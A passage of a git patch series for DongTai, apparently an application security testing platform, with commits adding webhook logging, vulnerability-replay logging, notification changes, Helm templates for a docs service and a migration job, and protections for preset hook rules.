b/dongtai_common/endpoint/__init__.py @@ -186,7 +186,7 @@ def parse_args(self, request): @staticmethod def get_paginator( - queryset: "QuerySet | ValuesQuerySet", page: int = 1, page_size: int = 20 + queryset: "QuerySet | ValuesQuerySet", page: int = 1, page_size: int = 20, max_page_size: int = 50 ) -> tuple[dict, "QuerySet | _SupportsPagination"]: """ 根据模型集合、页号、每页大小获取分页数据 @@ -197,7 +197,7 @@ def get_paginator( :param page_size: :return: """ - page_size = min(50, int(page_size)) + page_size = min(max_page_size, int(page_size)) page = int(page) try: page_info = Paginator(queryset, per_page=page_size) From 79172d770dd81da853fbf9790cabce3c18511020 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 4 Sep 2023 16:11:13 +0800 Subject: [PATCH 059/114] feat: modify notify --- dongtai_common/models/__init__.py | 1 + dongtai_common/models/notify_log.py | 14 +++++++++++ dongtai_engine/plugins/strategy_headers.py | 6 +---- .../signals/handlers/vul_handler.py | 6 +---- .../report/handler/hardencode_vul_handler.py | 6 +---- .../report/handler/narmal_vul_handler.py | 6 +---- dongtai_web/dongtai_sca/scan/tasks.py | 24 ++++++++++++------- dongtai_web/vul_log/vul_log.py | 2 +- 8 files changed, 36 insertions(+), 29 deletions(-) create mode 100644 dongtai_common/models/notify_log.py diff --git a/dongtai_common/models/__init__.py b/dongtai_common/models/__init__.py index 1f1f8eef1..3a3e5bae4 100644 --- a/dongtai_common/models/__init__.py +++ b/dongtai_common/models/__init__.py @@ -13,6 +13,7 @@ from .request_chains import * from .share_token import * from dongtai_common.utils.db_session_engine import Session +from .notify_log import IastWebHookLog LANGUAGE_DICT = {"JAVA": 1, "PYTHON": 2, "PHP": 3, "GO": 4} diff --git a/dongtai_common/models/notify_log.py b/dongtai_common/models/notify_log.py new file mode 100644 index 000000000..11ab597ec --- /dev/null +++ b/dongtai_common/models/notify_log.py @@ -0,0 +1,14 @@ +from django.db import models + +from dongtai_common.utils.settings import get_managed + + +class IastWebHookLog(models.Model): + id = models.BigAutoField(primary_key=True) + event_type = models.CharField(max_length=255) + body = models.JSONField() + create_time = models.IntegerField() + + class Meta: + managed = get_managed() + db_table = "iast_webhook_log" diff --git a/dongtai_engine/plugins/strategy_headers.py b/dongtai_engine/plugins/strategy_headers.py index 2b8c0a9ba..308b59c94 100644 --- a/dongtai_engine/plugins/strategy_headers.py +++ b/dongtai_engine/plugins/strategy_headers.py @@ -232,11 +232,7 @@ def save_vul(vul_type, method_pool, position="", data=""): vul.id, vul.strategy.vul_name, ) # type: ignore - send_notify.send_robust( - sender=save_vul, - vul_id=vul.id, - department_id=method_pool.agent.department_id, - ) + send_notify.send_robust(sender=save_vul, vul_id=vul.id) cache.delete(cache_key) header_vul = None if not IastHeaderVulnerability.objects.filter( diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index df013e058..75efeddfc 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -381,11 +381,7 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac vul.id, vul.strategy.vul_name, ) # type: ignore - send_notify.send_robust( - sender=save_vul, - vul_id=vul.id, - department_id=vul_meta.agent.department_id, - ) + send_notify.send_robust(sender=save_vul, vul_id=vul.id) VulMethodPool.objects.update_or_create( vul_id=vul.id, diff --git a/dongtai_protocol/report/handler/hardencode_vul_handler.py b/dongtai_protocol/report/handler/hardencode_vul_handler.py index c05eb8785..359cfd154 100644 --- a/dongtai_protocol/report/handler/hardencode_vul_handler.py +++ b/dongtai_protocol/report/handler/hardencode_vul_handler.py @@ -133,8 +133,4 @@ def save(self): iast_vul.id, # type: ignore iast_vul.strategy.vul_name, ) - send_notify.send_robust( - sender=self.__class__, - vul_id=iast_vul.id, - department_id=self.agent.department_id, - ) + send_notify.send_robust(sender=self.__class__, vul_id=iast_vul.id) diff --git a/dongtai_protocol/report/handler/narmal_vul_handler.py b/dongtai_protocol/report/handler/narmal_vul_handler.py index 14b9157c7..a014e75b2 100644 --- a/dongtai_protocol/report/handler/narmal_vul_handler.py +++ b/dongtai_protocol/report/handler/narmal_vul_handler.py @@ -252,11 +252,7 @@ def save(self): iast_vul.id, # type: ignore iast_vul.strategy.vul_name, ) - send_notify.send_robust( - sender=self.__class__, - vul_id=iast_vul.id, - department_id=self.agent.department_id, - ) + send_notify.send_robust(sender=self.__class__, vul_id=iast_vul.id) IastVulnerabilityModel.objects.filter( strategy_id=iast_vul.strategy_id, diff --git a/dongtai_web/dongtai_sca/scan/tasks.py b/dongtai_web/dongtai_sca/scan/tasks.py index 7ca4a1f65..bde7c7db1 100644 --- a/dongtai_web/dongtai_sca/scan/tasks.py +++ b/dongtai_web/dongtai_sca/scan/tasks.py @@ -21,6 +21,7 @@ ) from dongtai_common.models.package_focus import IastPackageFocus from dongtai_conf.settings import SCA_SETUP +from dongtai_engine.signals import send_notify from dongtai_protocol.views.hook_profiles import LANGUAGE_DICT from dongtai_web.dongtai_sca.common.dataclass import VulInfo @@ -98,7 +99,7 @@ class PackageVulSummary: unaffected_versions: tuple[str, ...] = () -def sca_scan_asset_v2(aql: str, ecosystem: str, package_name: str, version: str) -> PackageVulSummary: +def sca_scan_asset_v2(aql: str, ecosystem: str, package_name: str, version: str) -> tuple[PackageVulSummary, list[int]]: from dongtai_common.models.asset_vul_v2 import IastAssetVulV2, IastVulAssetRelationV2 vuls, affected_versions, unaffected_versions = get_package_vul_v4( @@ -107,9 +108,10 @@ def sca_scan_asset_v2(aql: str, ecosystem: str, package_name: str, version: str) package_name=package_name, ) vul_asset_rel_list = [] + vul_asset_list = [] for vul in vuls: logger.debug("vul_level %s", get_vul_level_dict()[vul.vul_info.severity.lower()]) - IastAssetVulV2.objects.update_or_create( + obj, _ = IastAssetVulV2.objects.update_or_create( vul_id=vul.vul_info.vul_id, defaults={ "vul_codes": vul.vul_codes.to_dict(), @@ -135,15 +137,19 @@ def sca_scan_asset_v2(aql: str, ecosystem: str, package_name: str, version: str) asset_vul_id=vul.vul_info.vul_id, asset_id=aql, ) + vul_asset_list.append(obj.pk) vul_asset_rel_list.append(vul_asset_rel) IastVulAssetRelationV2.objects.filter(asset_id=aql).delete() IastVulAssetRelationV2.objects.bulk_create(vul_asset_rel_list, ignore_conflicts=True) package_info_dict = stat_severity_v2([vul.vul_info for vul in vuls]) logger.debug("package_info_dict: %s", package_info_dict) - return PackageVulSummary( - affected_versions=affected_versions, - unaffected_versions=unaffected_versions, - **package_info_dict, + return ( + PackageVulSummary( + affected_versions=affected_versions, + unaffected_versions=unaffected_versions, + **package_info_dict, + ), + vul_asset_list, ) @@ -287,7 +293,7 @@ def new_update_one_sca( for package in packages: aql = get_package_aql(package.name, package.ecosystem, package.version) license_list = get_license_list_v2(package.license) - package_info = sca_scan_asset_v2(aql, package.ecosystem, package.name, package.version) + package_info, vul_asset_list = sca_scan_asset_v2(aql, package.ecosystem, package.name, package.version) obj, created = IastPackageGAInfo.objects.update_or_create( package_fullname=package.ecosystem + package.name, defaults={ @@ -308,7 +314,7 @@ def new_update_one_sca( "is_focus": is_focus, }, ) - AssetV2.objects.update_or_create( + asset, _ = AssetV2.objects.update_or_create( aql=assetglobalobj, project_id=agent.bind_project_id, project_version_id=agent.project_version_id, @@ -331,6 +337,8 @@ def new_update_one_sca( for i in license_list: license = IastAssetLicense(license_id=i["id"], asset=assetglobalobj) asset_license_list.append(license) + for i in vul_asset_list: + send_notify.send_robust(sender=new_update_one_sca, asset_id=asset.id, asset_vul_id=i) IastAssetLicense.objects.bulk_create(asset_license_list, ignore_conflicts=True) # create license list diff --git a/dongtai_web/vul_log/vul_log.py b/dongtai_web/vul_log/vul_log.py index e1e6e05ab..3298dfad8 100644 --- a/dongtai_web/vul_log/vul_log.py +++ b/dongtai_web/vul_log/vul_log.py @@ -50,7 +50,7 @@ def log_push_to_integration( source_vul_type: int, ): kwargs = locals() - msg = f"id为{user_id}的用户{user_name}推送漏洞到{integration_name}" + msg = f"推送漏洞到{integration_name}" if source_vul_type == 1: IastVulLog.objects.create( msg_type=MessageTypeChoices.PUSH_TO_INTEGRATION, From 073cc485940876a33424548e0cfb7e3dc9a340f9 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 4 Sep 2023 16:12:59 +0800 Subject: [PATCH 060/114] feat: modify notify --- .../migrations/0021_iastwebhooklog.py | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 dongtai_common/migrations/0021_iastwebhooklog.py diff --git a/dongtai_common/migrations/0021_iastwebhooklog.py b/dongtai_common/migrations/0021_iastwebhooklog.py new file mode 100644 index 000000000..c8528c0ed --- /dev/null +++ b/dongtai_common/migrations/0021_iastwebhooklog.py @@ -0,0 +1,28 @@ +# Generated by Django 3.2.20 on 2023-09-04 16:12 + +from django.db import migrations, models + + +class Migration(migrations.Migration): + dependencies = [ + ( + "dongtai_common", + "0020_iastagentrequestchainstopograph_iastagentrequestchainstopographvec_iastagentrequestchainstotalprojec", + ), + ] + + operations = [ + migrations.CreateModel( + name="IastWebHookLog", + fields=[ + ("id", models.BigAutoField(primary_key=True, serialize=False)), + ("event_type", models.CharField(max_length=255)), + ("body", models.JSONField()), + ("create_time", models.IntegerField()), + ], + options={ + "db_table": "iast_webhook_log", + "managed": True, + }, + ), + ] From 401dfb1a4208d5b5e95c7b423be01fa072357740 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 6 Sep 2023 15:16:09 +0800 Subject: [PATCH 061/114] refactor: vul details api parse_graph --- dongtai_web/views/vul_details.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_web/views/vul_details.py b/dongtai_web/views/vul_details.py index 7e483399e..6aac30b01 100644 --- a/dongtai_web/views/vul_details.py +++ b/dongtai_web/views/vul_details.py @@ -117,8 +117,8 @@ def get_server(self): "command": "", } + @staticmethod def parse_graphy( - self, graphy, extend_black_list: list | None = None, extend_white_list: list | None = None, @@ -136,7 +136,7 @@ def parse_graphy( results = [] try: - if graphy is None: + if not graphy: return results method_note_pool = json.loads(graphy)[0] method_counts = len(method_note_pool) From 53fe75d52ef04bd66767d44c7168c1335e500cea Mon Sep 17 00:00:00 2001 From: tscuite Date: Wed, 6 Sep 2023 16:39:39 +0800 Subject: [PATCH 062/114] feat: update ci --- deploy/kubernetes/helm/templates/_helpers.tpl | 9 ++++ .../templates/deployments/dongtai-doc.yaml | 43 +++++++++++++++++++ .../helm/templates/service/dongtai-doc.yaml | 17 ++++++++ 3 files changed, 69 insertions(+) create mode 100644 deploy/kubernetes/helm/templates/deployments/dongtai-doc.yaml create mode 100644 deploy/kubernetes/helm/templates/service/dongtai-doc.yaml diff --git a/deploy/kubernetes/helm/templates/_helpers.tpl b/deploy/kubernetes/helm/templates/_helpers.tpl index 1fd9f709e..d8170bcb9 100644 --- a/deploy/kubernetes/helm/templates/_helpers.tpl +++ b/deploy/kubernetes/helm/templates/_helpers.tpl @@ -345,6 +345,15 @@ Create the name of the service account to use location /log/ { proxy_pass http://dongtai-logstash-svc:8082/; } + {{- if .Values.max }} + location /doc/ { + proxy_pass http://dongtai-doc-svc/; + proxy_set_header X-real-ip $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header User-Agent $http_user_agent; + proxy_set_header X-Host $http_x_forwarded_host; + } + {{- end }} location = /50x.html { root /usr/share/nginx/html; } diff --git a/deploy/kubernetes/helm/templates/deployments/dongtai-doc.yaml b/deploy/kubernetes/helm/templates/deployments/dongtai-doc.yaml new file mode 100644 index 000000000..fb31d51c5 --- /dev/null +++ b/deploy/kubernetes/helm/templates/deployments/dongtai-doc.yaml @@ -0,0 +1,43 @@ +{{- if .Values.max }} +--- +# dongtai-doc服务 +apiVersion: apps/v1 +kind: Deployment +metadata: + name: {{ template "dongtai.fullname" . }}-doc + namespace: {{.Release.Namespace}} + annotations: + kubesphere.io/description: {{ template "dongtai.fullname" . }}-doc + labels: + app: {{ template "dongtai.fullname" . }}-doc + {{- include "dongtai.labels" . | nindent 4 }} +spec: + replicas: {{.Values.replicaCount}} + selector: + matchLabels: + app: {{ template "dongtai.fullname" . }}-doc + {{- include "dongtai.labels" . | nindent 6 }} + template: + metadata: + annotations: + doc_number: {{.Values.build.server_number}} + labels: + app: {{ template "dongtai.fullname" . }}-doc + {{- include "dongtai.labels" . | nindent 8 }} + spec: +{{- if .Values.nodeSelector }} + nodeSelector: +{{ toYaml .Values.nodeSelector | indent 8 }} +{{- end }} + containers: + - name: {{ template "dongtai.fullname" . }}-doc-container + image: {{ .Values.images }}/dongtai-doc:{{ .Values.tag }} + imagePullPolicy: Always + resources: + limits: + cpu: 500m + memory: 500Mi + requests: + cpu: 500m + memory: 500Mi +{{- end }} \ No newline at end of file diff --git a/deploy/kubernetes/helm/templates/service/dongtai-doc.yaml b/deploy/kubernetes/helm/templates/service/dongtai-doc.yaml new file mode 100644 index 000000000..799890cc9 --- /dev/null +++ b/deploy/kubernetes/helm/templates/service/dongtai-doc.yaml @@ -0,0 +1,17 @@ +{{- if .Values.max }} +--- +apiVersion: v1 +kind: Service +metadata: + name: dongtai-doc-svc + namespace: {{.Release.Namespace}} +spec: + ports: + - name: http + port: 80 + protocol: TCP + targetPort: 80 + selector: + app: {{ template "dongtai.fullname" . }}-doc + type: ClusterIP +{{- end }} \ No newline at end of file From 5222186852d5aaa04aad3bc7143a2e794d9e8401 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 6 Sep 2023 17:39:48 +0800 Subject: [PATCH 063/114] feat: add replay header --- dongtai_common/models/iast_vul_log.py | 1 + dongtai_engine/signals/handlers/vul_handler.py | 16 ++++++++++++++++ 2 files changed, 17 insertions(+) diff --git a/dongtai_common/models/iast_vul_log.py b/dongtai_common/models/iast_vul_log.py index 1272f7deb..63a73a0f2 100644 --- a/dongtai_common/models/iast_vul_log.py +++ b/dongtai_common/models/iast_vul_log.py @@ -13,6 +13,7 @@ class MessageTypeChoices(IntegerChoices): VUL_RECHECK = 2 PUSH_TO_INTEGRATION = 3 VUL_FOUND = 4 + VUL_REPLAY = 5 class IastVulLog(models.Model): diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index 75efeddfc..83e5b6f3e 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -1,5 +1,6 @@ #!/usr/bin/env python # datetime: 2021/4/30 下午3:00 +import base64 import json import time import uuid @@ -14,6 +15,7 @@ from dongtai_common.engine.compatibility import method_pool_3_to_2 from dongtai_common.models.agent_method_pool import MethodPool, VulMethodPool +from dongtai_common.models.iast_vul_log import IastVulLog, MessageTypeChoices from dongtai_common.models.profile import IastProfile from dongtai_common.models.project import IastProject, VulValidation from dongtai_common.models.replay_queue import IastReplayQueue @@ -415,6 +417,20 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac # IastVulnerabilityModel.objects.filter( # ).delete() + # 记录漏洞重放 + for header in base64.b64decode(vul.req_header).decode("utf-8").split("\n"): + if header.startswith("iast-server-replay-uuid:"): + uuid = header.removeprefix("iast-server-replay-uuid:") + msg = f"id为{vul.agent.bind_project.id}的项目{vul.agent.bind_project.name}在UUID为{uuid}的漏洞重放中检测到漏洞{vul.strategy.vul_name}" + IastVulLog.objects.create( + msg_type=MessageTypeChoices.VUL_REPLAY, + msg=msg, + meta_data=kwargs, + vul_id=vul.id, + user_id=vul.agent.user_id, + ) + break + logger.info(f"vul_found {vul.id}") return vul From 90fec8eabe1c06e65576dd2df11a89e962a8b0b3 Mon Sep 17 00:00:00 2001 From: st1020 Date: Wed, 6 Sep 2023 17:43:50 +0800 Subject: [PATCH 064/114] feat: add replay header --- dongtai_engine/signals/handlers/vul_handler.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index 83e5b6f3e..9e78a7ca2 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -420,8 +420,8 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac # 记录漏洞重放 for header in base64.b64decode(vul.req_header).decode("utf-8").split("\n"): if header.startswith("iast-server-replay-uuid:"): - uuid = header.removeprefix("iast-server-replay-uuid:") - msg = f"id为{vul.agent.bind_project.id}的项目{vul.agent.bind_project.name}在UUID为{uuid}的漏洞重放中检测到漏洞{vul.strategy.vul_name}" + replay_uuid = header.removeprefix("iast-server-replay-uuid:") + msg = f"id为{vul.agent.bind_project.id}的项目{vul.agent.bind_project.name}在UUID为{replay_uuid}的漏洞重放中检测到漏洞{vul.strategy.vul_name}" IastVulLog.objects.create( msg_type=MessageTypeChoices.VUL_REPLAY, msg=msg, From b84f784f4e107a1d4efeb25a1d314f95e1db9769 Mon Sep 17 00:00:00 2001 From: tscuite Date: Thu, 7 Sep 2023 17:06:31 +0800 Subject: [PATCH 065/114] feat: update ci --- deploy/kubernetes/helm/templates/_helpers.tpl | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/deploy/kubernetes/helm/templates/_helpers.tpl b/deploy/kubernetes/helm/templates/_helpers.tpl index d8170bcb9..14b61da0c 100644 --- a/deploy/kubernetes/helm/templates/_helpers.tpl +++ b/deploy/kubernetes/helm/templates/_helpers.tpl @@ -347,11 +347,13 @@ Create the name of the service account to use } {{- if .Values.max }} location /doc/ { - proxy_pass http://dongtai-doc-svc/; - proxy_set_header X-real-ip $remote_addr; - proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; - proxy_set_header User-Agent $http_user_agent; - proxy_set_header X-Host $http_x_forwarded_host; + proxy_pass http://dongtai-doc-svc/; + proxy_set_header X-Scheme $scheme; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-real-ip $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header User-Agent $http_user_agent; + proxy_set_header X-Host $http_x_forwarded_host; } {{- end }} location = /50x.html { From f9fce7d0e86ebb098ed269207a537ed3422064f2 Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 10:53:58 +0800 Subject: [PATCH 066/114] feat: update ci --- deploy/kubernetes/helm/templates/_helpers.tpl | 2 +- .../helm/templates/job/dongtai_update.yaml | 35 +++++++++++++++++++ deploy/kubernetes/helm/values.yaml | 1 + 3 files changed, 37 insertions(+), 1 deletion(-) create mode 100644 deploy/kubernetes/helm/templates/job/dongtai_update.yaml diff --git a/deploy/kubernetes/helm/templates/_helpers.tpl b/deploy/kubernetes/helm/templates/_helpers.tpl index 14b61da0c..a1e438724 100644 --- a/deploy/kubernetes/helm/templates/_helpers.tpl +++ b/deploy/kubernetes/helm/templates/_helpers.tpl @@ -346,7 +346,7 @@ Create the name of the service account to use proxy_pass http://dongtai-logstash-svc:8082/; } {{- if .Values.max }} - location /doc/ { + location /dongtai_doc/ { proxy_pass http://dongtai-doc-svc/; proxy_set_header X-Scheme $scheme; proxy_set_header X-Forwarded-Proto $scheme; diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml new file mode 100644 index 000000000..bee41db06 --- /dev/null +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -0,0 +1,35 @@ +{{- if .Values.migrate }} +--- +# dongtai-update服务 +apiVersion: batch/v1 +kind: Job +metadata: + name: {{ template "dongtai.fullname" . }}-update + namespace: {{.Release.Namespace}} + annotations: + "helm.sh/hook": pre-upgrade + "helm.sh/hook-weight": "-5" + kubesphere.io/description: {{ template "dongtai.fullname" . }}-update + labels: + app: {{ template "dongtai.fullname" . }}-update + {{- include "dongtai.labels" . | nindent 4 }} +spec: + template: + metadata: + labels: + app: {{ template "dongtai.fullname" . }}-update + {{- include "dongtai.labels" . | nindent 8 }} + spec: + restartPolicy: Never +{{- if .Values.nodeSelector }} + nodeSelector: +{{ toYaml .Values.nodeSelector | indent 8 }} +{{- end }} + containers: + - name: {{ template "dongtai.fullname" . }}-update-container + image: {{ .Values.images }}/dongtai-server:{{ .Values.tag }} + command: [ "/bin/sh","/opt/dongtai/deploy/docker/entrypoint.sh" ] + args: [ "migrate" ] + {{- include "deploy.config" . | nindent 10 }} + {{- include "deploy.config.vo" . | nindent 6 }} +{{- end }} \ No newline at end of file diff --git a/deploy/kubernetes/helm/values.yaml b/deploy/kubernetes/helm/values.yaml index 394967028..0fc2ba3a2 100644 --- a/deploy/kubernetes/helm/values.yaml +++ b/deploy/kubernetes/helm/values.yaml @@ -17,6 +17,7 @@ logging_level: INFO # DEBUG, INFO somaxconn: null #If system max net.core.somaxconn (128) . Example: somaxconn: 4096 healthcheck: true logstash: "true" +migrate: true nodeSelector: kubernetes.io/os: linux From 9a2da712b60440d788d33a50928542a834d0e37e Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 8 Sep 2023 11:43:53 +0800 Subject: [PATCH 067/114] feat: modify hook strategy update logic --- .../management/commands/load_hook_strategy.py | 31 ++++++++++++++++++- dongtai_web/serializers/hook_strategy.py | 1 + dongtai_web/serializers/hook_type_strategy.py | 4 +-- dongtai_web/views/engine_hook_rule_add.py | 19 +++++------- dongtai_web/views/engine_hook_rule_modify.py | 22 +++++-------- dongtai_web/views/engine_hook_rule_status.py | 13 +++++--- 6 files changed, 56 insertions(+), 34 deletions(-) diff --git a/deploy/commands/management/commands/load_hook_strategy.py b/deploy/commands/management/commands/load_hook_strategy.py index 3dd4d6fe6..cd1240a0c 100644 --- a/deploy/commands/management/commands/load_hook_strategy.py +++ b/deploy/commands/management/commands/load_hook_strategy.py @@ -110,7 +110,6 @@ def handle(self, *args, **options): hooktype_obj.save() hooktype_dict[f"{hook_type['value']}-{hook_type['type']}"] = hooktype_obj - HookStrategy.objects.filter(language_id=v, system_type=1).delete() with open(os.path.join(POLICY_DIR, f"{k.lower()}_full_policy.json")) as fp: full_policy = json.load(fp, object_pairs_hook=OrderedDict) for policy in full_policy: @@ -119,6 +118,21 @@ def handle(self, *args, **options): continue policy_strategy = strategy_dict[policy["value"]] for hook_strategy in policy["details"]: + if HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=1 + ).exists(): + # 如果已经存在规则,跳过创建 + continue + if HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=0 + ): + # 如果已经存在用户自定义规则,设置为系统规则,跳过创建 + hook_strategy_obj = HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=0 + ).get() + hook_strategy_obj.system_type = 1 + hook_strategy_obj.save() + continue del hook_strategy["language"] hook_strategy["language_id"] = v HookStrategy.objects.create(strategy=policy_strategy, **hook_strategy) @@ -127,6 +141,21 @@ def handle(self, *args, **options): continue policy_hook_type = hooktype_dict[f"{policy['value']}-{policy['type']}"] for hook_strategy in policy["details"]: + if HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=1 + ).exists(): + # 如果已经存在规则,跳过创建 + continue + if HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=0 + ): + # 如果已经存在用户自定义规则,设置为系统规则,跳过创建 + hook_strategy_obj = HookStrategy.objects.filter( + value=hook_strategy["value"], type=hook_strategy["type"], language_id=v, system_type=0 + ).get() + hook_strategy_obj.system_type = 1 + hook_strategy_obj.save() + continue del hook_strategy["language"] hook_strategy["language_id"] = v HookStrategy.objects.create(hooktype=policy_hook_type, **hook_strategy) diff --git a/dongtai_web/serializers/hook_strategy.py b/dongtai_web/serializers/hook_strategy.py index 4171472c0..0035d45dc 100644 --- a/dongtai_web/serializers/hook_strategy.py +++ b/dongtai_web/serializers/hook_strategy.py @@ -95,6 +95,7 @@ class Meta: "untags", "stack_blacklist", "command", + "system_type", ] def get_rule_type(self, obj): diff --git a/dongtai_web/serializers/hook_type_strategy.py b/dongtai_web/serializers/hook_type_strategy.py index 5a07bceea..50dd05d05 100644 --- a/dongtai_web/serializers/hook_type_strategy.py +++ b/dongtai_web/serializers/hook_type_strategy.py @@ -8,7 +8,7 @@ class HookTypeSerialize(serializers.ModelSerializer): class Meta: model = HookType - fields = ["id", "name"] + fields = ["id", "name", "system_type"] class StrategySerialize(serializers.ModelSerializer): @@ -16,7 +16,7 @@ class StrategySerialize(serializers.ModelSerializer): class Meta: model = IastStrategyModel - fields = ["id", "vul_name", "name"] + fields = ["id", "vul_name", "name", "system_type"] def get_name(self, obj): return obj.vul_name diff --git a/dongtai_web/views/engine_hook_rule_add.py b/dongtai_web/views/engine_hook_rule_add.py index ec37855e6..24c1cf535 100644 --- a/dongtai_web/views/engine_hook_rule_add.py +++ b/dongtai_web/views/engine_hook_rule_add.py @@ -197,18 +197,7 @@ def post(self, request): ignore_blacklist, ignore_internal, ) = self.parse_args(request) - if ( - all( - ( - rule_type, - rule_value, - rule_source, - inherit, - is_track, - ) - ) - is False - ): + if all((rule_type, rule_value, rule_source, inherit, is_track)) is False: return R.failure(msg=_("Incomplete parameter, please check again")) ser = _HookRuleAddBodyargsSerializer(data=request.data) @@ -240,6 +229,12 @@ def post(self, request): if "type" not in ser.validated_data else ser.validated_data["type"] ) + + if IastStrategyModel.objects.filter( + language_id=ser.validated_data["language_id"], type=type_, value=rule_value + ).exists(): + return R.failure(msg="Already exists same rule") + strategy = self.create_strategy( rule_value, rule_source, diff --git a/dongtai_web/views/engine_hook_rule_modify.py b/dongtai_web/views/engine_hook_rule_modify.py index ffef599ae..033232cdc 100644 --- a/dongtai_web/views/engine_hook_rule_modify.py +++ b/dongtai_web/views/engine_hook_rule_modify.py @@ -147,6 +147,13 @@ def post(self, request): strategy = HookStrategy.objects.filter(id=rule_id).first() if not strategy: return R.failure(msg=_("No such hookstrategy.")) + if strategy.system_type: + return R.failure(msg="Can not modify preset rule") + if IastStrategyModel.objects.filter( + language_id=strategy.language_id, type=strategy.type, value=rule_value + ).exists(): + return R.failure(msg="Already exists same rule") + if strategy.type == 4: hook_type = IastStrategyModel.objects.filter( id=rule_type, @@ -155,20 +162,7 @@ def post(self, request): hook_type = HookType.objects.filter( id=rule_type, ).first() - if ( - all( - ( - rule_id, - rule_type, - rule_value, - rule_source, - inherit, - is_track, - strategy, - ) - ) - is False - ): + if all((rule_id, rule_type, rule_value, rule_source, inherit, is_track, strategy)) is False: return R.failure(msg=_("Incomplete parameter, please check again")) ser = _EngineHookRuleModifySerializer(data=request.data) diff --git a/dongtai_web/views/engine_hook_rule_status.py b/dongtai_web/views/engine_hook_rule_status.py index 9f6c8d454..bea260236 100644 --- a/dongtai_web/views/engine_hook_rule_status.py +++ b/dongtai_web/views/engine_hook_rule_status.py @@ -1,6 +1,7 @@ #!/usr/bin/env python import logging +from django.db.models import Q from django.utils.translation import gettext_lazy as _ from rest_framework import serializers @@ -65,16 +66,14 @@ def parse_args(self, request): @staticmethod def set_strategy_status(strategy_id, strategy_ids, enable_status): if strategy_id: - rule = HookStrategy.objects.filter( - id=strategy_id, - ).first() + rule = HookStrategy.objects.filter(Q(system_type=0) if enable_status == -1 else Q(), id=strategy_id).first() if rule: rule.enable = enable_status rule.save() return 1 elif strategy_ids: return HookStrategy.objects.filter( - id__in=strategy_ids, + Q(system_type=0) if enable_status == -1 else Q(), id__in=strategy_ids ).update(enable=enable_status) return 0 @@ -112,7 +111,10 @@ def get(self, request): if op is None: return R.failure(msg=_("Operation type does not exist")) if rule_type is not None and scope == "all": - count = HookStrategy.objects.filter(hooktype__id=rule_type).update(enable=op) + count = HookStrategy.objects.filter( + Q(system_type=0) if op == -1 else Q(), + hooktype__id=rule_type, + ).update(enable=op) logger.info(_("Policy type {} operation success, total of {} Policy types").format(rule_type, count)) status = True if hook_rule_type is not None and language_id is not None and scope == "all": @@ -120,6 +122,7 @@ def get(self, request): HookType.objects.filter(language_id=language_id, type=hook_rule_type).values_list("id", flat=True).all() ) count = HookStrategy.objects.filter( + Q(system_type=0) if op == -1 else Q(), hooktype__id__in=hook_type_ids, ).update(enable=op) logger.info(_("total of {} Policy types").format(count)) From 26d21a5368df4fc8193ad8c9a3cf8fefe16c0016 Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 11:53:31 +0800 Subject: [PATCH 068/114] feat: update ci --- deploy/kubernetes/helm/templates/_helpers.tpl | 2 +- deploy/kubernetes/helm/templates/job/dongtai_update.yaml | 2 +- deploy/kubernetes/helm/values.yaml | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git a/deploy/kubernetes/helm/templates/_helpers.tpl b/deploy/kubernetes/helm/templates/_helpers.tpl index a1e438724..5ecea3fda 100644 --- a/deploy/kubernetes/helm/templates/_helpers.tpl +++ b/deploy/kubernetes/helm/templates/_helpers.tpl @@ -247,7 +247,7 @@ Create the name of the service account to use [security] csrf_trust_origins ={{.Values.csrfTrustOrigins}} - secret_key ={{.Values.secretKey}} + secret_key ={{ randAlphaNum 50 }} [smtp] server ={{.Values.smtp.server}} diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml index bee41db06..daa003a14 100644 --- a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -4,7 +4,7 @@ apiVersion: batch/v1 kind: Job metadata: - name: {{ template "dongtai.fullname" . }}-update + name: {{ template "dongtai.fullname" . }}-update-{{ randAlphaNum 10 